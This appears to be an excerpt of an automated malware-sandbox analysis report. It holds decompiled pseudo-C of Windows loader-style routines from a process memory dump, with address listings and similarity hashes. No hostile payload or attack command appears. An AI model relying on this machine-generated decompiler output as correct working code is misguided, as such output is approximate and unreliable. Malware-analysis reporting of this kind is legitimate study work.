										_t200 = E0539F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E053DB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x548b2f8; // 0xe30000
									if((_t206 |  *0x548b2fc) == 0 || ( *0x548b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x548b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E05446B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E05446AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E053AE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L053AEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E053D9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E053AE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L053A8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E053D3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x053ad5f2
0x053ad5f5
0x053ad5f5
0x053ad5fd
0x053ad600
0x053ad60a
0x053ad60d
0x053ad617
0x053ad61d
0x053ad627
0x053ad62e
0x053ad911
0x053ad913
0x00000000
0x053ad919
0x053ad919
0x053ad919
0x053ad634
0x053ad634
0x053ad634
0x053ad634
0x053ad640
0x053ad8bf
0x00000000
0x053ad646
0x053ad646
0x053ad64d
0x053ad652
0x053fb2fc
0x053fb2fc
0x053fb302
0x053fb33b
0x053fb341
0x00000000
0x053fb304
0x053fb304
0x053fb319
0x053fb31e
0x053fb324
0x053fb326
0x053fb332
0x053fb347
0x053fb34c
0x053fb351
0x053fb35a
0x00000000
0x053fb328
0x053fb328
0x00000000
0x053fb328
0x053fb326
0x053ad658
0x053ad658
0x053ad65b
0x053ad665
0x00000000
0x053ad66b
0x053ad66b
0x053ad66b
0x053ad66b
0x053ad66d
0x053ad672
0x053ad67a
0x00000000
0x00000000
0x053ad680
0x053ad686
0x053ad8ce
0x053ad8d4
0x053ad8dd
0x053ad8e0
0x053ad68c
0x053ad691
0x053ad69d
0x053ad6a2
0x053ad6a7
0x053ad6b0
0x053ad6b5
0x053ad6e0
0x053ad6b7
0x053ad6b7
0x053ad6b9
0x053ad6b9
0x053ad6bb
0x053ad6bd
0x053ad6ce
0x053ad6d0
0x053ad6d2
0x053fb363
0x053fb365
0x00000000
0x053fb36b
0x00000000
0x053fb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x053ad6bf
0x053ad6bf
0x053ad6e5
0x053ad6e7
0x053ad6e9
0x053ad6ec
0x053ad6ec
0x053ad6ef
0x053ad6f5
0x053ad6f9
0x053ad6fb
0x053ad6fd
0x053ad701
0x053ad703
0x053ad70a
0x053ad70a
0x053ad701
0x053ad710
0x053ad710
0x053ad6c1
0x053ad6c1
0x053ad6c6
0x053fb36d
0x053fb36f
0x00000000
0x053fb375
0x053fb375
0x053fb375
0x00000000
0x053fb375
0x00000000
0x053ad6cc
0x053ad6d8
0x053ad6d8
0x053ad6d8
0x00000000
0x053ad6c6
0x053ad6bf
0x00000000
0x053ad6da
0x053ad6da
0x053ad716
0x053ad71b
0x053ad720
0x053ad726
0x053ad726
0x053ad72d
0x00000000
0x053ad733
0x053ad739
0x053ad742
0x053ad750
0x053ad758
0x053ad764
0x053ad776
0x053ad77a
0x053ad783
0x053ad928
0x053ad92c
0x053ad93d
0x053ad944
0x053ad94f
0x053ad954
0x053ad956
0x053ad95f
0x053ad961
0x053ad973
0x053ad973
0x053ad956
0x053ad944
0x053ad92c
0x053ad78b
0x053fb394
0x053ad791
0x053ad798
0x053fb3a3
0x053fb3bb
0x053fb3bb
0x053ad7a5
0x053ad866
0x053ad870
0x053ad884
0x053ad892
0x053ad898
0x053ad89e
0x053ad8a0
0x053ad8a6
0x053ad8ac
0x053ad8ae
0x053ad8b4
0x053ad8b4
0x053ad8ae
0x053ad7a5
0x053ad78b
0x053ad7b1
0x053fb3c5
0x053fb3c5
0x053ad7c3
0x053ad7ca
0x053ad7e5
0x053ad7eb
0x053ad8eb
0x053ad8ed
0x00000000
0x053ad8f3
0x053ad8f3
0x053ad8f3
0x00000000
0x053ad8ed
0x053ad7cc
0x053ad7cc
0x053ad7d2
0x00000000
0x053ad7d4
0x053ad7d4
0x053ad7d7
0x053ad7df
0x053fb3d4
0x053fb3d9
0x053fb3dc
0x053fb3dc
0x053fb3df
0x053fb3e2
0x053fb468
0x053fb46d
0x053fb46f
0x053fb46f
0x053fb475
0x053ad8f8
0x053ad8f9
0x053ad8fd
0x053fb3e8
0x053fb3e8
0x053fb3eb
0x053fb3ed
0x00000000
0x053fb3ef
0x053fb3ef
0x053fb3f1
0x053fb3f4
0x053fb3fe
0x053fb404
0x053fb409
0x053fb40e
0x053fb410
0x053fb410
0x053fb414
0x053fb414
0x053fb41b
0x053fb420
0x053fb423
0x053fb425
0x053fb427
0x053fb42a
0x053fb42d
0x053fb42d
0x053fb42a
0x053fb432
0x053fb436
0x053fb438
0x053fb43b
0x053fb43b
0x053fb449
0x053fb44e
0x053fb454
0x053fb458
0x053fb458
0x053fb45d
0x00000000
0x053fb45d
0x053fb3ed
0x00000000
0x00000000
0x00000000
0x053ad7df
0x053ad7d2
0x053ad7ca
0x053fb37c
0x053fb37e
0x053fb385
0x053fb38a
0x00000000
0x053fb38a
0x053ad742
0x053ad7f1
0x053ad7f8
0x053fb49b
0x053fb49b
0x053ad800
0x053ad837
0x053ad843
0x053ad845
0x053ad847
0x053ad84a
0x053ad84b
0x053ad84e
0x053ad857
0x053ad802
0x053ad802
0x053ad80d
0x00000000
0x053ad818
0x053ad818
0x053ad824
0x053ad831
0x053fb4a5
0x053fb4ab
0x053fb4b3
0x053fb4b8
0x053fb4bb
0x00000000
0x053fb4c1
0x053fb4c1
0x053fb4c8
0x00000000
0x053fb4ce
0x053fb4d4
0x053fb4e1
0x053fb4e3
0x053fb4e5
0x00000000
0x053fb4eb
0x053fb4f0
0x053fb4f2
0x053adac9
0x053adacc
0x053adacf
0x053adad1
0x053add78
0x053add78
0x053adcf2
0x00000000
0x053adad7
0x053adad9
0x053adadb
0x00000000
0x00000000
0x053adae1
0x053adae1
0x053adae4
0x053adae6
0x053fb4f9
0x053fb4f9
0x053fb500
0x053adaec
0x053adaec
0x053adaf5
0x053adaf8
0x053adafb
0x053adb03
0x053adb11
0x053adb16
0x053adb19
0x053adb1b
0x053fb52c
0x053fb531
0x053fb534
0x053adb21
0x053adb21
0x053adb24
0x053adcd9
0x053adce2
0x053adce5
0x053add6a
0x053add6d
0x00000000
0x053add73
0x053fb51a
0x053fb51c
0x053fb51f
0x053fb524
0x00000000
0x053fb524
0x053adce7
0x053adce7
0x053adce7
0x00000000
0x053adce7
0x00000000
0x053adb2a
0x053adb2c
0x053adb31
0x053adb33
0x053adb36
0x053adb39
0x053adb3b
0x053adb66
0x053adb66
0x053adb3d
0x053adb3d
0x053adb3e
0x053adb46
0x053adb47
0x053adb49
0x053adb4c
0x053adb53
0x053adb55
0x053adb58
0x053adb5a
0x053fb50a
0x053fb50f
0x053fb512
0x053adb60
0x053adb60
0x053adb63
0x053adb63
0x00000000
0x053adb63
0x053adb5a
0x053adb3b
0x053adb24
0x053adb69
0x053adb69
0x053adb6c
0x053adb6f
0x053adb74
0x053fb557
0x053fb557
0x053fb55e
0x053adb7a
0x053adb7c
0x053adb7f
0x053adb82
0x053adb85
0x00000000
0x053adb8b
0x053adb8b
0x053adb8d
0x053adb9b
0x053adb9b
0x053adb9d
0x053adba0
0x053adba2
0x053adba4
0x053adba7
0x053adba9
0x053adbae
0x053adbae
0x053adbb1
0x053adbb4
0x053adbb4
0x053adbb7
0x053adbba
0x053adcd2
0x053adcd4
0x00000000
0x053adbc0
0x053adbc0
0x053adbd2
0x053adbd7
0x053adbda
0x053adbdd
0x053adbdf
0x00000000
0x053adbe5
0x053adbe5
0x053adbee
0x053adbf1
0x053fb541
0x053fb544
0x00000000
0x053fb546
0x053fb546
0x00000000
0x053fb546
0x053adbf7
0x053adbf7
0x053adbfd
0x053adbfd
0x053adbff
0x053adc0b
0x053adc15
0x053adc1b
0x053adc1d
0x053adc21
0x053adc21
0x053adc23
0x053adc23
0x053adc26
0x053adc29
0x053adc2b
0x00000000
0x00000000
0x053adc31
0x053adc34
0x053adc36
0x053adcbf
0x053adcbf
0x053adcc2
0x00000000
0x053adc3c
0x053adc41
0x053adc43
0x00000000
0x053adc45
0x053adc45
0x053adc47
0x00000000
0x053adc4d
0x053adc4d
0x053adc50
0x053adc52
0x053adc55
0x053adcfa
0x053adcfe
0x053add08
0x053add0a
0x053add0c
0x00000000
0x053add12
0x053add15
0x053add2d
0x053add2f
0x053add32
0x053add35
0x00000000
0x053add35
0x053adc5b
0x053adc5b
0x053adc5e
0x053adc61
0x053adc64
0x053adc67
0x053adc67
0x053adc6a
0x053adc6c
0x053adc8e
0x053adc8e
0x053adc91
0x053adc93
0x053adcce
0x053adcce
0x053adc95
0x053adc9c
0x053adc6e
0x053adc72
0x053adc75
0x053adc77
0x053adc79
0x053fb551
0x053fb551
0x00000000
0x053adc7f
0x053adc7f
0x053adc81
0x00000000
0x053adc83
0x053adc86
0x053adc88
0x00000000
0x00000000
0x00000000
0x00000000
0x053adc88
0x053adc81
0x053adc79
0x053adc6c
0x053adc55
0x053adc47
0x053adc43
0x00000000
0x053adc36
0x053adc23
0x00000000
0x053adbff
0x053adbf1
0x053adbdf
0x053adb8f
0x053adb92
0x053adb95
0x00000000
0x00000000
0x00000000
0x00000000
0x053adb95
0x053adb8d
0x053adb85
0x053adb74
0x053adc9f
0x053adca2
0x053adcb0
0x053adcb0
0x053adad1
0x053fb4e5
0x053fb4c8
0x00000000
0x00000000
0x00000000
0x053ad831
0x053ad80d
0x00000000
0x053ad800
0x053fb47f
0x053fb485
0x00000000
0x053fb485
0x053ad665
0x053ad652
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9203e200bb4804f571d87e481a94a7fb9a10a9725190b6e329dc18f52530477
Instruction ID: ba921bc30b938f88f7a3a90acb5b2ccffcd69225314bc9bfb753f010938b3c70
Opcode Fuzzy Hash: d9203e200bb4804f571d87e481a94a7fb9a10a9725190b6e329dc18f52530477
Instruction Fuzzy Hash: 8DE1E172B04319CFDB29DF14C958BB9B7B6FF85304F040599D90A9BA90DBB0AD81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 053A849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E053A849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x546f9c0);
				E053ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x5487b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E053ACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E053B2280( *[fs:0x30], 0x5488550);
						_t139 =  *0x5487b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E053CF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E053AFFB0(_t193, _t235, 0x5488550);
								L5:
								return E053ED130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E05391C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x5487b9c; // 0x0
							_t235 = L053B4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x5487b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E053CA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E053AFFB0(_t193, _t235, 0x5488550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L053B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L053B77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x5487b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x5487b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E053D37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x5487b9c; // 0x0
									_t214 = L053B4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E053D37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x5487b10 =  *0x5487b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x5487b04 =  *0x5487b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L053B77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L053B77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x5487b08 =  *0x5487b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E053D57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E053DF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L053B77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E053CA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L053B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E053D96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x053a849b
0x053a849b
0x053a849b
0x053a849b
0x053a849d
0x053a84a2
0x053a84a7
0x053a84b1
0x053a84d8
0x00000000
0x053a84b3
0x053a84c4
0x053a84c9
0x053a84cd
0x053a84cf
0x053a84cf
0x053a84d6
0x053a84e6
0x053a84e9
0x053a84ec
0x053a84ef
0x053a84f2
0x053a84f4
0x053a84fc
0x053a8501
0x053a8506
0x053a8509
0x053a86e0
0x053a86e5
0x053a86e8
0x053a86ed
0x053a86f0
0x053a86f2
0x053f9afd
0x053f9b02
0x053a84da
0x053a84df
0x053a84df
0x053a86fa
0x053a86fd
0x053a86fe
0x053a8701
0x053a8706
0x053a8709
0x053a870b
0x00000000
0x00000000
0x053a8711
0x053a8725
0x053a8727
0x053a872a
0x053a872c
0x053f9af0
0x053f9af5
0x053a8732
0x053a8732
0x053a8732
0x053a8735
0x053a8737
0x053a8515
0x053a8515
0x053a8518
0x053a851d
0x053a8523
0x053a8527
0x053a852b
0x053a8537
0x053a8539
0x053a853c
0x053a853e
0x053a868c
0x053a8691
0x053a8699
0x053a869b
0x053a8744
0x053a8748
0x053a86a1
0x053a86a1
0x053a86a1
0x053a86a4
0x053a86a8
0x053f9bdf
0x053f9bdf
0x053a86ae
0x053a86b0
0x00000000
0x053a86b6
0x00000000
0x053f9be9
0x053a86b0
0x053a8544
0x053a854a
0x053a854d
0x053a8551
0x053a876e
0x053a8778
0x053a877b
0x053a8780
0x053a8557
0x053a8557
0x053a855d
0x053a855d
0x053a856b
0x053a856e
0x053a8570
0x053a8573
0x053a8576
0x053a8576
0x053a8579
0x053a857b
0x00000000
0x00000000
0x053a8581
0x053a85a0
0x053a85a2
0x053a85a5
0x053a85a7
0x053f9b1b
0x053f9b1b
0x053a862e
0x053a862e
0x053a8631
0x053a8631
0x053a8634
0x053a8636
0x053a8669
0x053a8669
0x053a866b
0x053f9bbf
0x053f9bc4
0x053f9bc8
0x053f9bce
0x053f9bce
0x053a8671
0x053a8671
0x053a8674
0x053a8676
0x053f9bae
0x053f9bae
0x053a8676
0x053a867c
0x053a867e
0x053a8688
0x053a8688
0x00000000
0x053a867e
0x053a8638
0x053a8638
0x053a863b
0x053a863e
0x053a863f
0x053a8642
0x053a8645
0x053a8648
0x053a864d
0x053f9b69
0x053f9b6e
0x053f9b7b
0x053f9b81
0x053f9b85
0x053f9b89
0x053f9ba7
0x053f9b8b
0x053f9b91
0x053f9b9a
0x053f9b9f
0x053f9b9f
0x053a8788
0x053a878d
0x053a8763
0x053a8763
0x053a8766
0x00000000
0x053a8766
0x053f9b70
0x00000000
0x053f9b70
0x053a8656
0x053a865a
0x053a865c
0x053a8752
0x053a8756
0x00000000
0x00000000
0x053a875e
0x00000000
0x053a875e
0x053a8662
0x053a8662
0x053a8662
0x053a8666
0x00000000
0x053a8666
0x053a85b7
0x053a85b9
0x053a85bc
0x053a85bf
0x053a85cc
0x053a85d1
0x053a85d4
0x053a85db
0x053a85de
0x053a85e0
0x053f9b5f
0x00000000
0x053f9b5f
0x053a85e6
0x053a85ea
0x053a86c3
0x053a86c5
0x053a86c8
0x053a86ca
0x053f9b16
0x00000000
0x053f9b16
0x053a86d6
0x053a85f6
0x053a85f6
0x053a85f9
